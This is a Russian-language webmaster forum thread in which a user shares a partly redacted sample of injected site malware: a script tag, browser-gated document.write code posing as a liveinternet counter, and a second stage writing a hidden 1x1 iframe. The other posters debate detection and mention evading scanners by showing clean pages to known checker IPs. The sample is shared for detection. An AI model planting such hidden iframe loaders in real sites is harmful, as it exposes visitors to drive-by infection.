Нашел вирус. Это может быть у Вашего сайта.

12
V 4
2341

1)

<SCRIPT language="JavaScript" type="text/javascript" src="/_inc/_common/js/common_.js"></SCRIPT>

ИЛИ

<SCRIPT language="Javascript" src="http:/img/codes.js"></SCRIPT>

Скрипт естественно может быть любой.

2) В common.js:

if (navigator.appName == "Opera") { ;document.write('<script src="//liveinternet.ru/click?XXXXXXXX /'+Math.round(Math.random()*XXXXXXXX)+'.js"></script>'); } if (navigator.appName == "Microsoft Internet Explorer") { ;document.write('<script src="//liveinternet.ru/click?XXXXXXXXXXXX/'+Math.round(Math.random()*XXXXXXXX)+'.js"></script>'); };

3) GET XXXXXXXX/XXXXXX.js

document.write('<div style="visibility:hidden; position:absolute;"><iframe id="AdFox_iframe" frameBorder="0" src="//XXXXXXXXX/XXXXXXX.html" width="1" height="1" ></iframe></div>');

...

Пилю свою SafeBrowsing. Проверить и посмотреть можно на сборщике статистики - http://virusdomain.com (http://virusdomain.com)
K5 209
#1

пустая информация!!!

ни названия движка, ни анализа попадания, ни заплаток...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
V 4
#2

Было найдено на двух сайтах.

CMS-детекторами определить не удалось.

Анализ попадания и заплатки это не моё. Я занимаюсь тем, что ищу подобные сайты. Пилю, а точнее допилил, свою собственную safebrowsing.

Оба сайта, кстати, до сих пор не помечены ни яндексе, ни в google.

---------- Добавлено 10.02.2014 в 14:10 ----------

Смысл в том, что здесь собираюсь публиковать самые новые вирусные образцы, которые нахожу.

И если сегодня Yandex или Google SafeBrowsing не банит за это, то завтра вполне.

А я нахожу это уже сегодня. Вот в чем ценность этой информации.

Avatar 316
#3

virusdomain, не обижайтесь, но вы ерундой занимаетесь.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
V 4
#4

TF-Studio, Поясните?

Хотя...

подпись: kgtu5 - помогу с сайтом, удалю вирусы -> отзывы ТУТ и ТАМ

подпись: TF-Studio - Защищаем свои сайты от взлома - для получения инвайта пишите в личку свою почту.

И уж не за бесплатно работаем. А тут какой-то дебил палит темы... Да?

А по делу. Как и AK47.info (TF-Studio) так и почему-то хваленый antivirus-alarm.ru и подобные:

1) Где взять новые сигнатуры?

2) А если заражение идет через флеш, как поймаете. Не говоря уже о чем то другом.

3) А вот возьму и на лету проверю "правильный" сайт. Запишу в блокнотик ip, и не буду показывать этому ip ничего.

Avatar 316
#5
И уж не за бесплатно работаем.

Прежде чем крякать - стоит посмотреть.

1) Где взять новые сигнатуры?

Когда я их искал?

2) А если заражение идет через флеш, как поймаете. Не говоря уже о чем то другом.

я не занимаюсь лечением сайтов и не принимаю заказы.

вы для начала объясните смысл вашего топика, желательно без соплей и нытья.

V 4
#6

TF-Studio,

TF-Studio:
Прежде чем крякать - стоит посмотреть

Согласен, извиняюсь.

Насколько я понял ваш сервис сверяет дамп страницы, с сохранением и если изменился - алерт.

Возможно более узко - проверяется появлние новых iframe script.

Вот узкие места:

- вредоносный код загружается из стороннего ресурса(AD)

- узнать используемые ip, добавив левый сайт, и выдавать, что "нужно". Это к сожалению главный баг.

Я пошел по другому пути.

"С потолка" я получаю свежие сигнатуры, и простейшим сканером ищу их.

Получается по 50-100 найденных за сутки.

При 100-160K обследуемых.

Цель самопиар через полезную работу.

GC 159
GKC
#7

С учетом вашего ника - это глюки...

Автоматическое удаление информации (http://www.gkclab.com/russ/terminator/terminator.html) ... Мистический туризм (http://mystictourism.com/) в гости к призракам...
V 4
#8

GKC,

Чем могу доказать свою состоятельность?

Вообще-то я не хотел разбрасывать больше одного примера за день, но ради дела...

Могу гаранту скинуть адрес зараженного сайта, при этом он не обнаруживается Y или G safebrowsing.

Avatar 316
#9

Антивирусами тоже не обнаруживается?

V 4
#10

TF-Studio,

Да

проверим через virustotal.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий